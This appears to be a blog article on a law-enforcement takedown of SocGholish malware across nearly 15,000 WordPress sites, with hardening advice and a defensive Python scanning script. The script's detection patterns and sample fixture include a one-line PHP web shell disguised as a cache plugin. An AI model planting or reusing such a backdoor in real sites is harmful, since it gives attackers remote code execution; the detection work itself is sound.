ProBackend

Operation Endgame: Law Enforcement Seizes Control of SocGholish Malware Infrastructure From Nearly 15,000 WordPress Sites

A sweeping international operation dismantled the SocGholish malware distribution network, cleaning 14,971 compromised WordPress sites and disabling over 100 servers tied to Evil Corp—marking a pivotal moment in the multi-year Operation Endgame campaign against global cybercrime.

Riley Hawke

It didn’t make global headlines with fanfare—no raucous press conferences, no dramatic asset seizures broadcast live. But over the last few weeks, a quiet yet massive effort unfolded across borders and servers: international law enforcement quietly cleaned nearly 15,000 WordPress sites infected with SocGholish malware and took down more than 100 of the infrastructure pieces keeping it all afloat. This operation, known as Endgame, was just one episode in an ongoing war against the SocGholish botnet and its ties to Evil Corp, one of the most enduring cybercriminal organizations operating out of Russia for nearly two decades.

What makes this sweep so significant isn’t just the scale—though 14,971 infected sites is staggering—but how methodical and coordinated it was. This wasn’t a flash-and-bang operation against just one server cluster or botnet node; it targeted the entire infection chain, from distribution to payload delivery. And crucially, it didn’t just neutralize the threat; authorities also empowered site owners to secure their systems moving forward. The result? A rare moment where defenders didn’t just react—they took the initiative.

What Is SocGholish, and Why Should You Care?

If you’ve ever seen one of those annoying pop-ups warning your browser is out-of-date and suggesting a suspicious download, you’ve bumped into SocGholish’s domain of influence.

SocGholish (also tracked as FakeUpdates or GhoLoader) is a JavaScript-based malware loader that first surfaced around 2017. Unlike headline-grabbing ransomware, it operates quietly: it compromises legitimate websites, mostly WordPress deployments, and injects JavaScript that redirects visitors to fake browser-update prompts, typically styled as Chrome or Edge upgrades. When a visitor downloads and runs that "update," the payload establishes a foothold on their device.

The real danger isn't the fake update itself; it's what follows. SocGholish is a delivery mechanism for other tooling with far more severe consequences: the Dridex banking trojan, DoppelPaymer ransomware, the Koadic and Empire post-exploitation frameworks, the Chthonic banking trojan, and the AZORult information stealer. In many cases, once SocGholish has a foothold, the operators take time to map the compromised environment before deploying additional payloads.

What’s chilling is how long SocGholish has been around. In cybersecurity terms, a tool running since 2017 without major disruption is a long time indeed. It points to a certain level of sophistication and adaptability, especially when tied to groups like Evil Corp.

Evil Corp: Still Around, Even After Sanctions and Bounties

Evil Corp isn’t a new name. It’s been on the radar of law enforcement and threat intelligence teams for well over a decade—since 2007, to be exact. Known for operating alongside (or under the umbrella of) infamous malware families like Zeus and Dridex, Evil Corp has been linked to a string of high-profile campaigns:

  • WastedLocker: A ransomware strain used against enterprises and healthcare organizations.
  • Hades and Macaw Locker: Later rebrands of the same ransomware lineage, with evolving capabilities.
  • Phoenix CryptoLocker: Another 2021 rebrand attributed to the group.

The group has weathered U.S. Treasury sanctions, a $5 million reward offered by the U.S. State Department for information leading to the arrest of its leader, Maksim Yakubets, and years of global pressure, and yet it persists. SocGholish fits the playbook because it scales through compromised websites rather than relying solely on spear-phishing or brute-force access.

The link between Evil Corp and SocGholish isn’t just circumstantial. Intelligence gathered by Europol and other agencies over the course of Operation Endgame confirms a structural connection—Evil Corp wasn’t just using SocGholish; it was central to how they delivered payloads across thousands of victims.

Operation Endgame: A Multi-Year Campaign, One Battle at a Time

This week's sweep is the latest chapter in Operation Endgame, an initiative that has targeted everything from ransomware servers to credential-stealing infrastructure. In November 2025 an earlier Endgame phase took down more than 1,000 servers tied to the Rhadamanthys stealer, VenomRAT, and the Elysium botnet, a sign that this was never a one-off.

In fact, looking back at Endgame’s history shows just how broad its scope has been:

  • Ransomware infrastructure dismantled
  • Smokeloader botnet customers and servers seized
  • AVCheck, a counter-antivirus service that let malware developers test whether security products detected their samples before deploying them
  • A full fleet of malware families including DanaBot, IcedID, Pikabot, Trickbot, Bumblebee, and SystemBC

Each takedown represents an opportunity to understand the threat better—not just where it lives, but how it communicates, what infrastructure it uses (CDNs? VPS providers?), and how often it overlaps with other operations. That intelligence, in turn, feeds back into future operations.

The Dutch National High Tech Crime Unit (NHTCU), the Royal Canadian Mounted Police (RCMP), the FBI, and Germany's Federal Criminal Police Office (BKA) were the backbone of this week's effort, with Europol and Eurojust providing coordination. That kind of cross-border alignment is no small feat; it speaks to the maturity and trust built up between agencies over years of collaboration.

How Authorities Actually Cleaned 14,971 Sites

Here’s the thing: you can’t manually clean 14,971 WordPress sites. That would require thousands of security professionals and months—if not years—of labor.

Instead, the takedown team relied on a mix of technical automation and smart post-cleanup recommendations:

  1. Malware removal at scale – Automated tooling removed SocGholish JavaScript injections from infected WordPress installations.
  2. Backdoor cleanup – In many cases, SocGholish had deployed persistent backdoors to ensure future access. These were purged from the sites’ file systems and databases.
  3. Guidance for site owners – Crucially, law enforcement didn't just clean the sites and walk away. They provided clear hardening guidance:
    • Change all credentials (hosting, admin, database)
    • Enable multi-factor authentication everywhere possible
    • Delete unknown or dormant WordPress user accounts
    • Update core, plugins, and themes to the latest versions

This “cleanup plus hardening” approach is what makes this operation stand out from previous botnet takedowns. Too often, sites get cleaned only to be reinfected days or weeks later because the root cause—weak passwords, outdated plugins, unmonitored admin accounts—is never addressed.

Maikel Rollman of the Dutch NHTCU put it best: “With these actions we deprive cybercriminals of access to infected computer systems. This prevents further damage… and limits the spread of malware.”

He added a crucial note: “This marks the beginning of further action against SocGholish.”

In other words, this wasn’t the end. It was a demonstration that coordinated action can disrupt even well-entrenched threats—and an invitation to other defenders to join the effort.

What Website Owners Should Do Now

Even if your site wasn’t part of this week’s takedown (and odds are it wasn’t—these things rarely affect every compromised site at once), SocGholish’s tactics remain a real threat. The group behind it hasn’t vanished; they simply shifted infrastructure to stay under the radar.

If you run a WordPress site, here’s what to do right now:

  • Scan for unauthorized users – Look especially for admins added outside your usual team. SocGholish often leaves backdoor accounts.
  • Review plugin and theme changes – If you don't have a logging strategy, start one. SocGholish infections often show up as sudden, unexplained plugin installations or modified theme files.
  • Audit your file structure and database – SocGholish typically adds small JavaScript files under wp-content or hides code in otherwise benign-looking PHP files, and injections can also be stored in the database (posts and options) rather than on disk, so include a database export in the review.
  • Rotate all passwords and API keys – A compromised site can expose every credential it holds, and reused passwords remain exposed to credential-stuffing attacks.
  • Enable MFA everywhere – Not just your WordPress admin—also hosting control panels, database access, and any third-party APIs.
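The following Python script is an added example, not tooling from the operation or from any agency involved; it turns the cleanup steps described in the takedown section and the checklist above into a first-pass triage a site owner can run against a WordPress docroot. It flags code files in `wp-content/uploads`, `<script>` tags loading from hosts the site does not normally use, obfuscated inline JavaScript, and common PHP backdoor constructs, then compares the administrator list against a known-good allowlist. The regexes are generic indicators of injected or obfuscated code, not SocGholish-specific signatures; the sample docroot, the WP-CLI-style user list, and the `ALLOWED_HOSTS` and `KNOWN_ADMINS` allowlists are constructed here for illustration and would be replaced with the site's own values.

```python
"""Triage a WordPress docroot for injected script and PHP backdoors, and audit
the administrator list against a known-good allowlist.

Added example, not tooling from the operation. The patterns are generic
indicators of obfuscated/injected code, not SocGholish signatures; the sample
docroot, user list and allowlists below are constructed for illustration."""
import json
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

CODE_SUFFIXES = {".php", ".phtml", ".js"}
SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)
INLINE_SCRIPT = re.compile(r"<script(?![^>]*\ssrc=)[^>]*>(.*?)</script>", re.I | re.S)
OBFUSCATION = re.compile(r"\b(?:eval|atob|unescape)\s*\(|String\.fromCharCode\s*\(", re.I)
PHP_BACKDOOR = re.compile(
    r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("
    r"|\b(?:system|shell_exec|passthru|exec)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b",
    re.I,
)


def script_hosts(text):
    """Hostnames of every <script src=...> in text (protocol-relative URLs included)."""
    hosts = set()
    for src in SCRIPT_SRC.findall(text):
        host = urlparse("https:" + src if src.startswith("//") else src).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def inline_scripts(path, text):
    """Script bodies to inspect: the whole file for .js, <script> blocks otherwise."""
    return [text] if path.suffix.lower() == ".js" else INLINE_SCRIPT.findall(text)


def scan_docroot(root, allowed_hosts):
    """Walk the docroot; return (relative path, reason) pairs worth a human look."""
    root, findings = Path(root), []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel, suffix = path.relative_to(root).as_posix(), path.suffix.lower()
        # uploads should contain media only; executable code there is a red flag
        if rel.startswith("wp-content/uploads/") and suffix in CODE_SUFFIXES:
            findings.append((rel, "code file inside wp-content/uploads"))
        if suffix not in CODE_SUFFIXES | {".html"}:
            continue
        text = path.read_text(errors="replace")
        for host in sorted(script_hosts(text) - set(allowed_hosts)):
            findings.append((rel, f"script loaded from unexpected host {host}"))
        if any(OBFUSCATION.search(body) for body in inline_scripts(path, text)):
            findings.append((rel, "obfuscated inline JavaScript"))
        if suffix in {".php", ".phtml"} and PHP_BACKDOOR.search(text):
            findings.append((rel, "PHP backdoor pattern"))
    return findings


def unknown_admins(users_json, known_logins):
    """Administrators absent from the allowlist. users_json is shaped like the
    output of `wp user list --format=json` (roles is a comma-separated string)."""
    return [u["user_login"] for u in json.loads(users_json)
            if "administrator" in u.get("roles", "").split(",")
            and u["user_login"] not in known_logins]


# Constructed sample data: a toy docroot and a WP-CLI-style user list.
SAMPLE_FILES = {
    "wp-content/themes/site/header.php":
        '<?php wp_head(); ?>\n<script src="https://cdn.example-site.test/app.js"></script>\n',
    "wp-content/themes/site/footer.php":
        '<?php wp_footer(); ?>\n<script src="//static.unknown-cdn.test/t.js"></script>\n'
        "<script>eval(atob('YWxlcnQoMSk='));</script>\n",
    "wp-content/uploads/2024/01/update.js": "document.write('Update your browser');\n",
    "wp-content/uploads/2024/01/photo.jpg": "binary placeholder\n",
    "wp-content/plugins/cache-helper/helper.php":
        "<?php if (isset($_POST['c'])) { eval(base64_decode($_POST['c'])); }\n",
}
SAMPLE_USERS = json.dumps([
    {"ID": 1, "user_login": "editor-in-chief", "user_email": "eic@example-site.test",
     "user_registered": "2019-03-02 10:11:12", "roles": "administrator"},
    {"ID": 7, "user_login": "wp-support", "user_email": "x@mailbox.test",
     "user_registered": "2025-11-30 03:14:15", "roles": "administrator"},
    {"ID": 8, "user_login": "writer", "user_email": "w@example-site.test",
     "user_registered": "2021-01-01 00:00:00", "roles": "author"},
])
ALLOWED_HOSTS = {"cdn.example-site.test"}  # hosts the site legitimately loads script from
KNOWN_ADMINS = {"editor-in-chief"}         # admin logins the owner actually created


def run_demo():
    """Build the sample docroot in a temp dir, scan it, audit the sample users."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLE_FILES.items():
            (Path(tmp) / rel).parent.mkdir(parents=True, exist_ok=True)
            (Path(tmp) / rel).write_text(body)
        findings = scan_docroot(tmp, ALLOWED_HOSTS)
    return findings, unknown_admins(SAMPLE_USERS, KNOWN_ADMINS)


if __name__ == "__main__":
    findings, admins = run_demo()
    for rel, reason in findings:
        print(f"{reason:58} {rel}")
    print("unknown administrators:", admins)
```

On the sample docroot the scan reports the backdoor in the fake cache plugin, the unexpected script host and the obfuscated inline script in the theme footer, and the stray `.js` in uploads, while the clean header and the image produce nothing; the user audit flags the administrator account the owner never created. The findings are triage leads, not verdicts: legitimate minified libraries do use `unescape` and `String.fromCharCode`, so each hit needs a human look. Because injections also live in the database, run the same `INLINE_SCRIPT`/`OBFUSCATION` patterns over a `wp db export` dump, and treat a positive result as a reason to rebuild from a clean source rather than to edit the file in place.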

There’s no silver bullet here. But following these steps dramatically raises the barrier for attackers looking to repurpose your site as part of SocGholish’s next wave.

What Comes Next for SocGholish and Operation Endgame?

The Dutch authorities’ statement that this “marks the beginning of further action” is deliberate. SocGholish has shown resilience—it adapted from initial takedowns, shifted infrastructure, and even evolved its infection chain to avoid detection. That kind of adaptability suggests there are still active variants out there.

Some security researchers expect a few possible trajectories:

  • A rebrand or split: SocGholish could evolve into multiple, slightly different variants to confuse defenders. This has happened before with Dridex and Emotet.
  • Increased use of social engineering: If law enforcement tightens technical defenses, expect more phishing lures, fake support calls, and misleading update prompts.
  • Tighter integration with ransomware groups: Given the clear overlap between SocGholish and Evil Corp, expect more targeted infections that lead directly to ransomware deployment.

The good news? This week’s takedown gives defenders a snapshot of SocGholish’s current infrastructure—names, IPs, domains, and even code patterns. That intelligence will feed into detection rules across firewalls, SIEMs, and endpoint tools for months to come.

Final Thoughts: A Small Win With Big Implications

This operation wasn’t flashy, and it didn’t make front-page news like some high-profile ransomware cases have. But in many ways, that’s exactly why it matters.

When you look at the numbers—14,971 sites cleaned, over 100 servers taken down—it represents something rare: defenders operating at scale and winning. Too often, cybercrime stories end with a system compromised, data leaked, or ransoms paid. This time, the outcome was different: sites restored, infections neutralized, and a clear message sent to operators of SocGholish and Evil Corp.

This kind of coordinated response—cross-border, multi-agency, and technically driven—is what the cybersecurity world needs more of. It shows that when defenders act in concert, even long-running operations like SocGholish can be disrupted.

And if Maikel Rollman is right—and this truly is just the beginning—then Operation Endgame has only just started to reveal its potential.
